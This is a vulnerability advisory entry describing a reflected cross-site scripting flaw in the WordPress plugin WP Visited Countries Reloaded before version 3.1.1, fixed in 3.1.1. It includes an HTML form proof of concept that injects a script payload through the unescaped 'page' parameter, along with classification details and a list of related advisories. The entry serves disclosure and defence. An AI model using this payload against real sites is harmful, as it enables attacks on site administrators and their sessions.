WP Visited Countries Reloaded < 3.1.1 – Reflected Cross-Site Scripting | Plugin Vulnerabilities

Description

The plugin does not escape the page parameter in its Countries dashboard before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

<html>
  <body>
    <form action="httsp://example.com/wp-admin/admin.php?page=wpvc-countries" method="POST">
      <input type="hidden" name="page" value='"><script>alert(/XSS/)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

wp-visited-countries-reloaded

Fixed in 3.1.1

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

ad80091a-c653-42d1-b504-46933c3bccf3

Timeline

Publicly Published

2021-09-27 (about 4 years ago)

Added

2021-12-29 (about 4 years ago)

Last Updated

2021-12-29 (about 4 years ago)

Other

Published

Title

Published

2025-10-17

Title

XStore Core < 5.6 - Reflected Cross-Site Scripting

Published

2025-01-24

Title

PDF Invoices for WooCommerce + Drag and Drop Template Builder < 4.7.0 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-07-17

Title

vCita Online Booking & Scheduling Calendar < 4.4.1 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-06-22

Title

WP eMember < 10.6.6 - Bulk Delete via CSRF

Published

2024-10-30

Title

Step by Step <= 0.4.5 - Authenticated (Contributor+) Stored Cross-Site Scripting